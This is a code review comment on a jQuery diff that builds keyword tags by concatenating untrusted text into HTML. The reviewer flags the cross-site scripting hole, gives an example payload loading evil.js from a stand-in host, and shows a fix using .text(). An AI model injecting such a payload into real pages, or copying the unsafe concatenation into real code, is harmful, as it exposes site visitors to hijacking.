theme/static/js/custom.js

```diff
@@ -78,7 +78,8 @@ $(document).ready(function() {
     var keywords = $("#keywords").text().split(",");
     var list = $("#list-keywords");
     for (var i = 0; i < keywords.length; i++){
-        list.append("<li><a class='tag'>" + keywords[i] + "</a></li>");
+        if (keywords[i])
+            list.append("<li><a class='tag'>" + keywords[i] + "</a></li>");
```

Comment:
This is a security vulnerability. What if someone enters keywords containing `<script src="http://uhoh.com/evil.js"></script>`? Instead, create the `<li>` and then insert the text safely.

```
var li = $("<li><a class='tag'></a></li>");
li.find('a').text(keywords[i]);
list.append(li);
```